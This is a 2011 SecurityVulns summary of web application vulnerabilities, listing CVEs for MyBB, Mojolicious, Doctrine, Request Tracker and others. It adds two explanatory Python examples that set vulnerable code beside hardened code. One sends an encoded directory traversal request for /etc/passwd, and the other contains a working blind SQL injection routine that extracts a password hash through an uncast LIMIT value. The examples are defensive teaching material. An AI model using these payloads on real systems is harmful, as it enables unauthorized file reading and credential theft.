Computer Security


Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published: 21.04.2011
Source:
SecurityVulns ID: 11609
Type: remote
Threat Level: 5/10
Description: PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected:4HOMEPAGES : 4images 1.7
 MYBB : Mybb 1.6
 WORDPRESS : Ajax Category Dropdown 0.1
 ZENPHOTO : ZenPhoto 1.4
 CA : SiteMinder 6
 CA : SiteMinder 12
 DOCTRINE : doctrine 1.2
 LIBMOJOLICUS : libmojolicious 1.16
CVE:CVE-2011-1718 (The Web Agents component in CA SiteMinder R6 before SP6 CR2 and R12 before SP3 CR2 does not properly handle multi-line headers, which allows remote authenticated users to conduct impersonation attacks and gain privileges via crafted data.)
 CVE-2011-1690 (Best Practical Solutions RT 3.6.0 through 3.6.10 and 3.8.0 through 3.8.8 allows remote attackers to trick users into sending credentials to an arbitrary server via unspecified vectors.)
 CVE-2011-1689 (Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.)
 CVE-2011-1688 (Directory traversal vulnerability in Best Practical Solutions RT 3.2.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote attackers to read arbitrary files via a crafted HTTP request.)
 CVE-2011-1687 (Best Practical Solutions RT 3.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote authenticated users to obtain sensitive information by using the search interface, as demonstrated by retrieving encrypted passwords.)
 CVE-2011-1686 (Multiple SQL injection vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors, as demonstrated by reading data.)
 CVE-2011-1685 (Best Practical Solutions RT 3.8.0 through 3.8.9 and 4.0.0rc through 4.0.0rc7, when the CustomFieldValuesSources (aka external custom field) option is enabled, allows remote authenticated users to execute arbitrary code via unspecified vectors, as demonstrated by a cross-site request forgery (CSRF) attack.)
 CVE-2011-1589 (Directory traversal vulnerability in Path.pm in Mojolicious before 1.16 allows remote attackers to read arbitrary files via a %2f..%2f (encoded slash dot dot slash) in a URI.)
 CVE-2011-1522 (Multiple SQL injection vulnerabilities in the Doctrine\DBAL\Platforms\AbstractPlatform::modifyLimitQuery function in Doctrine 1.x before 1.2.4 and 2.x before 2.0.3 allow remote attackers to execute arbitrary SQL commands via the (1) limit or (2) offset field.)
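The Mojolicious entry (CVE-2011-1589) describes the classic ordering mistake behind encoded-slash traversal: the server collapses `..` segments on the raw request path and only then percent-decodes it, so `%2f..%2f` is one innocent-looking segment until decoding turns it into a real `/../`. The following Python block is an added example written for this page, not code from Mojolicious or from any advisory listed here; the document root `/srv/www/public` and the sample request paths are constructed for the demonstration. It shows the vulnerable order beside the hardened one (decode first, validate each segment, then confirm the resolved path is still under the root).

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the demonstration (hypothetical path).
DOCROOT = "/srv/www/public"


def resolve_naive(url_path):
    """Vulnerable pattern: collapse '..' segments on the raw request path and
    percent-decode afterwards. A %2f is not a separator while the '..' check
    runs, so 'images%2f..%2f' is treated as one harmless segment; decoding it
    later yields real '/../' components that the filesystem will honour."""
    kept = []
    for seg in url_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if kept:
                kept.pop()
            continue
        kept.append(seg)
    decoded = "/".join(unquote(seg) for seg in kept)
    # posixpath.normpath stands in for what open() on a POSIX host resolves
    # (symlinks aside): '..' produced by decoding walks out of DOCROOT.
    return posixpath.normpath(posixpath.join(DOCROOT, decoded))


def resolve_safe(url_path):
    """Hardened form: decode exactly once, then validate every segment of the
    decoded path, then confirm the normalised target is still inside DOCROOT.
    Returns the filesystem path to serve, or None if the request is rejected."""
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None
    target = posixpath.normpath(posixpath.join(DOCROOT, *segments))
    # Belt and braces: even if segment validation is later relaxed, never
    # serve anything whose resolved path is outside the root.
    if target != DOCROOT and not target.startswith(DOCROOT + "/"):
        return None
    return target


if __name__ == "__main__":
    for req in ("/css/site.css",
                "/../../etc/passwd",
                "/images%2f..%2f..%2f..%2f..%2fetc%2fpasswd"):
        print("%-45s naive=%s safe=%s" % (req, resolve_naive(req), resolve_safe(req)))
```

Note that `resolve_naive` does block a plain `/../../etc/passwd`, which is why this class of bug survives casual testing; the encoded form is what escapes. The hardened resolver decodes once and only once: a double-encoded `%252e%252e` decodes to the literal file name `%2e%2e`, which is harmless as long as no later layer decodes it again, so the decode count must match what the rest of the server does.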
Original document: MustLive, Multiple vulnerabilities in MyBB (21.04.2011)
 DEBIAN, [SECURITY] [DSA 2221-1] Mojolicious security update (21.04.2011)
 DEBIAN, [SECURITY] [DSA 2223-1] doctrine security update (21.04.2011)
 CA, CA20110420-01: Security Notice for CA SiteMinder (21.04.2011)
 DEBIAN, [SECURITY] [DSA 2220-1] Request Tracker security update (21.04.2011)
 High-Tech Bridge Security Research, HTB22946: Multiple SQL Injection in Ajax Category Dropdown wordpress plugin (21.04.2011)
 High-Tech Bridge Security Research, HTB22945: Multiple XSS in ZENphoto (21.04.2011)
 High-Tech Bridge Security Research, HTB22950: SQL injection in 4images (21.04.2011)
 High-Tech Bridge Security Research, HTB22949: Multiple Path disclosure in 4images (21.04.2011)
 High-Tech Bridge Security Research, HTB22944: Path disclosure in ZENphoto (21.04.2011)
 High-Tech Bridge Security Research, HTB22947: XSS in Ajax Category Dropdown wordpress plugin (21.04.2011)
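The Doctrine advisory (DSA 2223-1, CVE-2011-1522 above) concerns a query builder that appended `limit` and `offset` values to the statement without coercing them to integers. These values often look harmless because they are "just numbers" from a paging parameter, but anything that reaches the LIMIT clause uncast is SQL. The block below is an added Python example written for this page, not Doctrine's code; the `users` table, its two rows and the hash values are constructed sample data, and the function names are hypothetical. It places the vulnerable builder beside a hardened one and then shows what an attacker can do with the uncast value: SQLite accepts an arbitrary scalar expression after LIMIT, so a page size that evaluates to 1 or 0 depending on a character of another user's stored hash turns the row count into a boolean oracle and recovers the hash one character at a time.

```python
import re
import sqlite3

_COUNT_RE = re.compile(r"[0-9]+")


def build_limit_query_vulnerable(sql, limit, offset=None):
    """Pattern behind CVE-2011-1522: limit/offset are appended exactly as
    received, so whatever the caller passes becomes part of the statement."""
    sql = "%s LIMIT %s" % (sql, limit)
    if offset is not None:
        sql = "%s OFFSET %s" % (sql, offset)
    return sql


def _as_count(value, name):
    """Accept an int or a canonical decimal string and nothing else.
    Negatives are rejected too: in SQLite, LIMIT -1 means 'no limit'."""
    if isinstance(value, bool):
        raise ValueError("%s must be a non-negative integer" % name)
    if isinstance(value, str):
        if not _COUNT_RE.fullmatch(value):
            raise ValueError("%s must be a non-negative integer" % name)
        value = int(value)
    if not isinstance(value, int) or value < 0:
        raise ValueError("%s must be a non-negative integer" % name)
    return value


def build_limit_query_safe(sql, limit, offset=None):
    """Hardened form: coerce first, then embed the resulting integers.
    Only digits can ever reach the statement."""
    sql = "%s LIMIT %d" % (sql, _as_count(limit, "limit"))
    if offset is not None:
        sql = "%s OFFSET %d" % (sql, _as_count(offset, "offset"))
    return sql


def demo_db():
    """Constructed sample data: two users, hashes are md5('password') and
    md5('123456'), chosen only so the recovered value is recognisable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users(name, password_hash) VALUES (?, ?)",
                     [("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),
                      ("bob", "e10adc3949ba59abbe56e057f20f883e")])
    return conn


def blind_probe(conn, build, position, guess):
    """Attacker-controlled page size: the subquery evaluates to 1 when the
    guessed character is right and 0 otherwise, so the row count leaks it."""
    limit = ("(SELECT CASE WHEN substr(password_hash,%d,1)='%s' THEN 1 ELSE 0 END "
             "FROM users WHERE id=1)" % (position, guess))
    rows = conn.execute(build("SELECT name FROM users", limit)).fetchall()
    return len(rows) == 1


def recover_hash(conn, build, length=32):
    """Recover user 1's hex hash through the row-count oracle; at most 16
    queries per character, none of which ever returns the hash itself."""
    recovered = []
    for position in range(1, length + 1):
        for ch in "0123456789abcdef":
            if blind_probe(conn, build, position, ch):
                recovered.append(ch)
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % position)
    return "".join(recovered)


if __name__ == "__main__":
    conn = demo_db()
    print("vulnerable builder leaks:", recover_hash(conn, build_limit_query_vulnerable))
    try:
        recover_hash(conn, build_limit_query_safe)
    except ValueError as exc:
        print("safe builder rejects the probe:", exc)
    print(build_limit_query_safe("SELECT name FROM users", "10", "20"))
```

What the injected text can achieve depends on the backend (SQLite evaluates expressions in LIMIT; other engines are stricter), but the fix is the same everywhere and is the one the Doctrine update applied in spirit: treat paging parameters as integers before they touch the statement, not as fragments of SQL.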

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod